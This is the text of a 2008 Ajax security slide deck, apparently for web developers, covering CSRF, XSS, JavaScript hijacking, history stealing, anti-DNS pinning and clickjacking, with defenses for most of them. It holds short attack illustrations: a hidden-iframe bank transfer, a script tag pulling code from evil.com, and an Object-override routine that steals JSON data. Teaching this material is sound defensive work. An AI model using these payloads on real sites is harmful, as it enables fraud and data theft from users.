Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Ajax Security
1. Ajax Security
Keeping your application safe
Joe Walker
Copyright SitePen, Inc. 2008. All Rights Reserved
2. 89 out of 10 Websites
have serious vulnerabilities
Copyright SitePen, Inc. 2008. All Rights Reserved
3. Goal: Keep the bad guys
out of your website
Copyright SitePen, Inc. 2008. All Rights Reserved
4. The Attackers
Who is the attacker?
• Troublemakers / Thieves
Who is the victim?
• Your data / Your users / Your partners
Copyright SitePen, Inc. 2008. All Rights Reserved
5. Agenda
CSRF, Login CSRF
JavaScript Hijacking
XSS
History Stealing
Combination Attacks
Session Fixation + ADP +
Clickjacking
Copyright SitePen, Inc. 2008. All Rights Reserved
6. CSRF
(Cross Site Request Forgery)
You can still abuse someone else’s cookies
and headers even if you can’t read them
7. Recap: Cross-Domain Rules
www.bank.com www.evil.com
c = document.cookie; c = document.cookie;
alert(c); alert(c);
/* /*
Shows cookies from Shows cookies from
www.bank.com www.evil.com
*/ */
Copyright SitePen, Inc. 2008. All Rights Reserved
8. Abusing a Cookie without reading it
www.bank.com www.evil.com
Welcome to Bank.com
Welcome to Evil.com
We offer the best rates anywhere in
We’ve got lots of warez to give away
the world, guaranteed. Give us your
for freee. Download our stuffs and
money and we will look after it in
then come back and get more
the same way we look after little
stuffs. Videoz, Warez, Codez, Mp3s
baby kittens.
.
<iframe width=0 height=0
src=quot;http://bank.com/transfer?amnt=all&dest=MrEvilquot;/>
Copyright SitePen, Inc. 2008. All Rights Reserved
9. CSRF
JavaScript is not always required to exploit a CSRF hole
Often all you need is:
• <iframe src=quot;dangerous_urlquot;>
• or <img src=quot;dangerous_urlquot;/>
• or <script src=quot;dangerous_urlquot;>
You can’t use XHR because cross-domain rules prevent
the request from being sent
Copyright SitePen, Inc. 2008. All Rights Reserved
10. CSRF
CSRF attacks are write-only (with one exception)
Both GET and POST can be forged
Referrer checking is not a complete fix
It’s not just cookies that get stolen:
• HTTP-Auth headers
• Active Directory Kerberos tokens
Copyright SitePen, Inc. 2008. All Rights Reserved
11. CSRF - Protection
Not 100%
solution
Force users to log off
Check referrer headers (https only)
Include authentication tokens
The only
complete
in the body of EVERY request
solution
Copyright SitePen, Inc. 2008. All Rights Reserved
12. CSRF - Protection
Security tokens in GET requests are not a great idea
(bookmarks, caches, GET is idempotent etc)
POST means forms with hidden fields
• OWASP servlet filter
http://www.owasp.org/index.php/CSRF_Guard
Double-submit cookie pattern (Ajax requests only)
• Read the cookie with Javascript and submit in the
body
Copyright SitePen, Inc. 2008. All Rights Reserved
14. Login CSRF
If I can make your browser do things behind your back,
how about logging you out of some service and back in
as me.
What are the possibilities when you think that you are
you, but you’re not; you’re me?
Copyright SitePen, Inc. 2008. All Rights Reserved
15. Login CSRF - Attacks
What can I do?
• See what you search for
• See what books you want to buy
• Read emails that you send
• Steal credit card details through PayPal
• etc
Copyright SitePen, Inc. 2008. All Rights Reserved
16. Login CSRF - Defense
If submitting over https: use Referrer checking
• Do not assume no referrer is safe
Use authentication tokens in your login form
Watch out for session fixation attacks
• Invalidate the server session on login and re-create it
Copyright SitePen, Inc. 2008. All Rights Reserved
17. JavaScript
Hijacking
(or how your GMail
contacts were at risk)
Sucking data out of Objects before
they’re created
18. JavaScript Hijacking
“CSRF is write-only with one known exception”
Using <script> automatically evaluates the returned
script
So if you can just find a way to intercept scripts as they
are evaluated ...
Copyright SitePen, Inc. 2008. All Rights Reserved
19. <script type=quot;text/javascriptquot;>
function Object() {
alert(quot;Hello, Worldquot;);
}
var x = {};
</script>
Copyright SitePen, Inc. 2008. All Rights Reserved
20. <script type=quot;text/javascriptquot;>
function Object() {
this.__defineSetter__('wibble', function(x) {
alert(x);
});
}
var x = {};
x.wibble = quot;Hello, Worldquot;;
</script>
Copyright SitePen, Inc. 2008. All Rights Reserved
21. <script type=quot;text/javascriptquot;>
var obj;
function Object() {
obj = this;
this.__defineSetter__('killme', function(x) {
for (key in obj) {
if (key != 'killme') {
alert('Stolen: ' + key + '=' + obj[key]);
}
}
});
setTimeout(quot;obj['killme']='ignored';quot;, 0);
}
</script>
<script src=quot;http://example.com/data-service/quot;>
Copyright SitePen, Inc. 2008. All Rights Reserved
22. JavaScript Hijacking
When you serve JavaScript from a website it
could be evaluated in a hostile environment
Protect secrets in JavaScript in the same way
that you would protect them elsewhere
Copyright SitePen, Inc. 2008. All Rights Reserved
23. JavaScript Hijacking
Sometimes people wish to have a double layer of
security to prevent evaluation:
/*<JSON_HERE>*/ (Don’t do this)
while(true); <JSON_HERE> (Google)
throw new Error(quot;quot;); <JSON_HERE> (DWR)
{}&& <JSON_HERE>
Copyright SitePen, Inc. 2008. All Rights Reserved
24. XSS (Cross Site Scripting)
Abusing someone’s trust in your typing
26. XSS
2 types:
• Reflected: Script embedded in the request is
‘reflected’ in the response
• Stored: Attacker’s input is stored and played back in
later page views
Copyright SitePen, Inc. 2008. All Rights Reserved
27. XSS
Scenario: You let the user enter their name
Someone is going to enter their name like this:
Joe<script src=quot;http://evil.com/danger.jsquot;>
Then, whoever looks at Joe’s name will execute Joe’s
script and become a slave of Joe
Generally HTML is not a valid input, but sometimes it is:
• Blogs, MySpace, Wikis, RSS readers, etc
Copyright SitePen, Inc. 2008. All Rights Reserved
28. XSS - Making User Input Safe
So, you filter out ‘<script.*>’ and then you’re safe.
Right?
Copyright SitePen, Inc. 2008. All Rights Reserved
30. XSS - Making User Input Safe
It’s made 1000 times worse by browsers being able to
make sense of virtually anything.
This:
<a href=quot;a.htmlquot; link</a>
makes perfect sense to a browser.
Copyright SitePen, Inc. 2008. All Rights Reserved
31. XSS - Making User Input Safe
It’s made 1000 times worse by browsers being able to
make sense of virtually anything.
This:
<a href=quot;a.htmlquot;>link
makes perfect sense to a browser.
Copyright SitePen, Inc. 2008. All Rights Reserved
32. XSS - Making User Input Safe
It’s made 1000 times worse by browsers being able to
make sense of virtually anything.
This:
<a href=quot;a.html >link</a>
makes perfect sense to a browser.
Copyright SitePen, Inc. 2008. All Rights Reserved
33. XSS - Making User Input Safe
It’s made 1000 times worse by browsers being able to
make sense of virtually anything.
This: (depending on some encoding tricks)
¼a href=quot;a.htmlquot;¾link¼/a¾
makes perfect sense to a browser.
Copyright SitePen, Inc. 2008. All Rights Reserved
34. XSS - Making User Input Safe
And we haven’t got into:
• Flash (ActionScript ~= JavaScript)
• SVG (can embed JavaScript)
• XML Data Islands (IE only)
• HTML+TIME
You can use both <object> and <embed> for many of
these
Copyright SitePen, Inc. 2008. All Rights Reserved
35. XSS - The Heart of the Problem
“Be conservative in what you do; be
liberal in what you accept from others”
Postel’s Law
Copyright SitePen, Inc. 2008. All Rights Reserved
36. XSS - The Heart of the Problem
In + A Out
B
Copyright SitePen, Inc. 2008. All Rights Reserved
37. The web developers get lazy ...
Copyright SitePen, Inc. 2008. All Rights Reserved
38. The browser fixes the problems ...
Copyright SitePen, Inc. 2008. All Rights Reserved
39. The users like
the new
browser ...
Copyright SitePen, Inc. 2008. All Rights Reserved
41. The browser fixes the problems ...
Copyright SitePen, Inc. 2008. All Rights Reserved
42. The users like the
new browser even
more ...
Copyright SitePen, Inc. 2008. All Rights Reserved
43. XSS - The Heart of the Problem
¼STYLE¾@import'javas
cri
pt:danger()';¼/STYLE¾
Copyright SitePen, Inc. 2008. All Rights Reserved
44. XSS - Protection (HTML is Illegal)
1. Filter inputs by white-listing input characters
• Remember to filter header names and values
2. Filter outputs for the destination environment
For HTML:
< < > > ' ' quot; " & &
For JavaScript Strings (but see later):
' ' quot; quot; LF n CR r * uXXXX
Other environments have other special chars
Copyright SitePen, Inc. 2008. All Rights Reserved
45. XSS - Protection (well-formed HTML is legal)
1. Filter inputs as before
2. Validate as HTML and throw away if it fails
3. Swap characters for entities (as before)
4. Swap back whitelist of allowed tags. e.g.:
• <strong> <strong>
5. Take extra care over attributes:
• <a href="([^&]*)"/>
<a href=quot;$1quot;/>
6. Take great care over regular expressions
Copyright SitePen, Inc. 2008. All Rights Reserved
46. XSS - Protection (malformed HTML is legal)
1. Find another way to do it / Swap jobs / Find
some other solution to the problem
2. Create a tag soup parser to create a DOM tree
from a badly formed HTML document
• Remember to recursively check encodings
3. Create a tree walker that removes all non
approved elements and attributes
Copyright SitePen, Inc. 2008. All Rights Reserved
47. There is NO WAY to protect
against some injection points
Copyright SitePen, Inc. 2008. All Rights Reserved
48. XSS - Injection Points
Places you can protect:
• Plain content
<div>$</div>
• Some attribute values
<input name=x value=quot;$quot;> (but take care)
• Javascript string values:
<script>str = quot;$quot;;</script> (but take care)
Anything else is likely to be unsafe
Copyright SitePen, Inc. 2008. All Rights Reserved
49. XSS - Injection Points
Places you can’t easily protect:
• <script>$</script>
• <div $>
• <div style=quot;$quot;>...
• <div background=quot;$quot;>
• <img src=quot;$quot;>
• etc
If users can affect CSS values, hrefs, srcs or plain
JavaScript then you are likely to have an XSS hole
Copyright SitePen, Inc. 2008. All Rights Reserved
50. XSS Tricks:
Comment Power-up
Copyright SitePen, Inc. 2008. All Rights Reserved
51. XSS - Comment Power-up
Commonly reflected attacks have length restrictions
How to create space for an injection attack
• Use ‘<script>/*’ in an restricted unprotected field
and ‘*/’ in a later unrestricted protected field
Copyright SitePen, Inc. 2008. All Rights Reserved
52. XSS - Summary
For data input:
• Restrict allowed characters for destination type
For data output:
• Escaped for the destination environment
• Ensure encoding is specified (e.g. UTF-8)
Allow inject only into known safe points
Never assume that a hole is too small to jump through
Copyright SitePen, Inc. 2008. All Rights Reserved
54. History Stealing - Part 1
Mr. Evil wants to know if you visit bank.com
He creates a page with a link and
uses a script to read the CSS link
color:
• purple: customer
• blue: not a customer
Copyright SitePen, Inc. 2008. All Rights Reserved
55. History Stealing - Part 2
2 methods of detecting link color:
• Easy - use JavaScript to read CSS properties
• When JS is turned off - use CSS to ping the server
Copyright SitePen, Inc. 2008. All Rights Reserved
56. History Stealing - Part 2
Point a script tag at a protected HTML resource, detect
differing replies by differing error messages
<script src=quot;http://mail.google.com/mailquot;>
http://ha.ckers.org/weird/javascript-website-login-checker.html
Copyright SitePen, Inc. 2008. All Rights Reserved
57. History Stealing - Part 3
A page can quickly check thousands of sites and find
where you bank and store your email
A page can follow your clicks around the net:
• Check for common set of URLs
• Page reports hits to server
• Server reads hit pages, greps out links sends links
back
• Page checks and follows a click-stream
Copyright SitePen, Inc. 2008. All Rights Reserved
59. Web Worms
If your site that isn’t 100% safe against XSS and CSRF, users
can attack their ‘friends’ with scripts
XHR/Flash/Quicktime can be used as a vector
Web worms grow much faster than email worms
So far, infections have been mostly benign, like how email
worms were in the early 90’s ...
http://www.whitehatsec.com/downloads/WHXSSThreats.pdf
Copyright SitePen, Inc. 2008. All Rights Reserved
60. Intranet Hacking
History stealing to enumerate hosts inside the firewall
Anti-DNS pinning to read HTML from inside
Many routers / firewalls / etc have default passwords,
which an attacker can exploit
Use CSRF to alter router / firewall settings
http://www.whitehatsec.com/home/resources/presentations/files/javascript_malware.pdf
Copyright SitePen, Inc. 2008. All Rights Reserved
62. Clickjacking - Protection
if (window.top != window) {
document.body.style.display = quot;nonequot;;
}
Copyright SitePen, Inc. 2008. All Rights Reserved
63. ADP = Anti DNS Pinning
Moving intranet servers into your
domain
64. Anti-DNS Pinning
DNS for evil.com
1.2.3.4
10.0.0.1
Copyright SitePen, Inc. 2008. All Rights Reserved
65. Anti-DNS Pinning
DNS for evil.com
1.2.3.4
Let’s visit
evil.com 10.0.0.1
Copyright SitePen, Inc. 2008. All Rights Reserved
66. Anti-DNS Pinning
DNS for evil.com
What’s the IP address
for evil.com? 1.2.3.4
10.0.0.1
Copyright SitePen, Inc. 2008. All Rights Reserved
67. Anti-DNS Pinning
DNS for evil.com
You need 1.2.3.4
(timeout = 1 sec)
1.2.3.4
10.0.0.1
Copyright SitePen, Inc. 2008. All Rights Reserved
68. Anti-DNS Pinning
DNS for evil.com
1.2.3.4
Can I have
http://evil.com?
10.0.0.1
Copyright SitePen, Inc. 2008. All Rights Reserved
69. Anti-DNS Pinning
HTML +
DNS for evil.com
JavaScript that
creates an iframe
2 seconds after
1.2.3.4
the page has
loaded
10.0.0.1
Copyright SitePen, Inc. 2008. All Rights Reserved
70. Anti-DNS Pinning
DNS for evil.com
1.2.3.4
Time passes
(2 seconds) 10.0.0.1
Copyright SitePen, Inc. 2008. All Rights Reserved
71. Anti-DNS Pinning
DNS for evil.com
What’s the IP address
for evil.com? 1.2.3.4
10.0.0.1
Copyright SitePen, Inc. 2008. All Rights Reserved
72. Anti-DNS Pinning
DNS for evil.com
You need 10.0.0.1
1.2.3.4
10.0.0.1
Copyright SitePen, Inc. 2008. All Rights Reserved
73. Anti-DNS Pinning
DNS for evil.com
1.2.3.4
Can I have 10.0.0.1
http://evil.com/blah?
Copyright SitePen, Inc. 2008. All Rights Reserved
74. Anti-DNS Pinning
DNS for evil.com
1.2.3.4
This web server is really
http://intranet.corp.com
10.0.0.1
Copyright SitePen, Inc. 2008. All Rights Reserved
75. Anti-DNS Pinning
Outer frame reads DNS for evil.com
text from inner
iframe and sends
it back to 1.2.3.4 1.2.3.4
10.0.0.1
Copyright SitePen, Inc. 2008. All Rights Reserved
76. Anti-DNS Pinning
About ‘Pinning’:
Browsers ‘pin’ addresses to stop short timeouts
DNS round-robin forces re-query of DNS if
website appears to be down
So websites can get around pins by firewalling
themselves thus appearing to be down
Copyright SitePen, Inc. 2008. All Rights Reserved
77. Anti-DNS Pinning
It’s not great for the Internet:
The browser thinks the domain is evil.com, so cookies
for innocent.com are not sent:
Cookie protected resources are safe (for now)
But it’s great for Intranet hacking
No cookies needed to read from
192.168.0.1 or 127.0.0.1
Copyright SitePen, Inc. 2008. All Rights Reserved
78. Questions?
Joe Walker
http://sitepen.com
http://directwebremoting.org/blog/joe
Copyright SitePen, Inc. 2008. All Rights Reserved
80. Web 2.0 Hacking
Building blocks:
• Google Alerts: Search to EMail
• Mailinator: EMail to RSS
• Ponyfish: Web to RSS via scraping
• Storage: DabbleDB, Zoho
• Yahoo Pipes: RSS remixing
• L8R: Cron for EMail
• Google Mashup Editor: RSS to REST API
• Dapper, OpenKappow
Copyright SitePen, Inc. 2008. All Rights Reserved
82. Dropping SSL after login is dangerous
Being able to snoop on someone else’s cookie is
virtually the same as being able to snoop on their
password
Some services (e.g. Google) default to http after login
(bad), but allow you to use https for the whole session:
• https://mail.google.com/mail/
• https://www.google.com/calendar/
• etc.
Copyright SitePen, Inc. 2008. All Rights Reserved
83. Useful Tools
Firefox:
• NoScript - Accept scripts only from sites you trust
• AltCookies - Accept cookies only from sites you trust
• EditCooikes - Alter cookies for testing
• Firebug - Dig deeply into HTTP/JavaSript/CSS and HTTP
General:
• Paros - Filtering Proxy (can be configured to be
transparent)
• Burp - Like Paros
• Fiddler - Like Paros with integration into IE
Copyright SitePen, Inc. 2008. All Rights Reserved